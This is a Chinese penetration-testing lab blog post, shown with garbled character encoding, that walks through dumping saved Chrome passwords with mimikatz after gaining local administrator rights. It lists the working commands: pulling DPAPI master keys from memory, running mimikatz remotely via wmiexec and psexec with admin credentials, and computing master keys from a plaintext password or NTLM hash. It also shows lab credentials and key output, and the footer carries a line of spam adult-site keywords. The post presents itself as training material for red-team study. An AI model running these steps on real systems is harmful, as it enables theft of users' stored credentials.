<strike id="kne6g"><label id="kne6g"></label></strike>

      咨詢服務(wù)熱線

      400-6446-808

      創(chuàng)安實驗室專欄
      您的當(dāng)前位置:首頁 > 創(chuàng)安實驗室專欄
      使用mimikatz導(dǎo)出chrome密碼
      發(fā)布者:創(chuàng)信華通  發(fā)布時間:2022-08-01  瀏覽量:511次


      寫在前面

      古語有云:“學(xué)如逆水行舟,不進則退?!泵鎸θ缃耠S時都在變化的網(wǎng)絡(luò)安全環(huán)境更是如此。為此,創(chuàng)信華通微信公眾號特開設(shè)“滲透專欄”,以記錄創(chuàng)信華通創(chuàng)安攻防實驗室在滲透技術(shù)上的探索,加強同行間的交流,相互學(xué)習(xí),共同進步。




      ?使用mimikatz導(dǎo)出chrome密碼

        2022.07.25




      模擬場景

      在獲取某PC本地administrator的權(quán)限情況下,導(dǎo)出使用該PC機域普通賬號的密碼。

      受害機ip:

      192.168.3.4

      受害機賬戶:


      · 本地管理員:administrator/toor

      · 域普通賬戶:beta\fengjie/qqq123!@#




      加密機制簡介

      chrome儲存的明文密碼時使用windows提供的DPAPI進行對稱加密來保證安全性。加解密的密鑰稱為master key。master key被用戶登錄密碼、SID和16字節(jié)隨機數(shù)加密后保存在Master Key file(%APPDATA%\Microsoft\Protect\%SID%)中。



      最簡單的情況:A用戶拖A自己的密碼

      1

      dpapi::chrome /in:'C:\Users\fengjie\AppData\Local\Google\Chromr\User

      2

      Data\Default\Login Data' /unprotect



      在A用戶登陸狀態(tài)B解密A的chrome密碼

      在用戶登陸狀態(tài)下可以直接用procdump或者mimikatz直接從內(nèi)存中獲取master key。

      1

      privilege::debug

      2

      sekurlsa::dpapi

      3


      4

      python wmiexec.py administrator:toor@192.168.3.4 'c:\users\public\mimikatz.exe "privilege::debug" "sekurlsa::dpapi" exit'


      Alt text

      獲取到masterkey

      1

      0bf0be64d4dc768a543b3a12d7c5210d184c07a3861cad8f2bd8b7bbacc60fd0e06e955b6dad057d070d1ce3b2bb331fd8dbce6efad08808f1849e4f4ef26d80

      1b81b1c9cb66a3f93b58f85948e8ce53779c6e5d   

      2




      接下來用mimikatz一把梭就可以了

      1

      python wmiexec.py administrator:toor@192.168.3.4 'cd c:\users\public && Minimimini64.exe "dpapi::chrome

      /in:\"C:\Users\fengjie\AppData\Local\Google\Chrome\User Data\Default\Login Data\" /masterkey:1b81b1c9cb66a3f93b58f85948e8ce53779c6e5d" exit '



      最開始用wmiexec并未解密成功

      Alt text

      后來發(fā)現(xiàn)是wmiexec的鍋換成psexec就好了(用smbexec也可以,懷疑是因為用wmiexec時令牌完整性受限的原因,知道的師傅請教我一手)

      Alt text


      在A用戶離線狀態(tài)B解密A的chrome密碼

      現(xiàn)在用mimikatz重新抓已經(jīng)抓不到fengjie的master key了

      Alt text

      用戶明文密碼已知


      這種情況下有兩種方法可以選擇。

      1.如果我們知道fengjie的明文密碼,可以用runas降權(quán)(或者進行一些spwan的操作降權(quán)),降權(quán)之后又回到了最簡單的情況。(因為runas需要交互式shell,所以這種方法比較雞肋)

      1

      runas /user:fengjie@beta.com "cmd.exe"

      2


      3

      mimikatz dpapi::chrome /in:”%localappdata%\Google\Chrome\User

      Data\Default\Cookies” /unprotect


      2.在沒有交互式的情況下可以直接用mimikatz直接算出master key。

      1

      dpapi::masterkey 

      /in:"c:\Users\fengjie\AppData\Roaming\Microsoft\Protect\S-1-5-21-2274946182-2013957047-1890316882-1632\59a94dbc-6dbb-4d51-bec0-edebc6f2e9f8"

      /password:qqq123!@#


      Alt text

      拿到master key后情況又相當(dāng)于又轉(zhuǎn)換回了用戶在線的情景。

      用戶明文密碼未知,知道NTLM hash


      1

      dpapi::masterkey 

      /in:"c:\Users\fengjie\AppData\Roaming\Microsoft\Protect\S-1-5-21-2274946182-2013957047-1890316882-1632\59a94dbc-6dbb-4d51-bec0-edebc6f2e9f8" 

      /hash:632f6adad4510099d676724bfb87c6ee


      Alt text




      總結(jié)

      簡單的說就是三種情況:

      A用戶獲取自己chrome密碼不需要知道m(xù)aster key

      A獲取B用戶,如果B用戶在線,那么可以直接從內(nèi)存中抓取出B的maste key

      A獲取B用戶,B不在線,就需要用b用戶的明文密碼或者NTLM hash計算出master key,在回到上面一步。



      本文由創(chuàng)信華通創(chuàng)安攻防實驗室編輯。

      本文僅限于個人學(xué)習(xí)和技術(shù)研究,由于傳播、利用此文所提供的信息而造成刑事案件、非授權(quán)攻擊等違法行為,均由使用者本人負責(zé),本單位不為此承擔(dān)任何責(zé)任。創(chuàng)安攻防實驗室擁有對此文章的修改和解釋權(quán),如欲轉(zhuǎn)載或傳播此文章,必須保證此文章的完整性,包括版權(quán)聲明等全部內(nèi)容。


      如有侵權(quán),請聯(lián)系后臺。




      創(chuàng)安攻防實驗室

      創(chuàng)安攻防實驗室,是成都創(chuàng)信華通信息技術(shù)有限公司旗下的技術(shù)研究團隊,成立于2021年9月,主要研究紅藍對抗、重大安全保障、應(yīng)急響應(yīng)等方向。

      創(chuàng)安攻防實驗室圓滿完成了多次公安舉辦的重要網(wǎng)絡(luò)安全保障和攻防演習(xí)活動,并積極參加各類網(wǎng)絡(luò)安全競賽,屢獲殊榮。

      創(chuàng)安攻防實驗室秉承創(chuàng)信華通的發(fā)展理念,致力打造國內(nèi)一流網(wǎng)絡(luò)安全團隊。


      ·END·



      下一條:msf漏洞驗證
      亚洲伊人久久大香线焦,欧美日韩国产高清一区二区三区,国产人免费人成免费视频,亚洲高清在线观看看片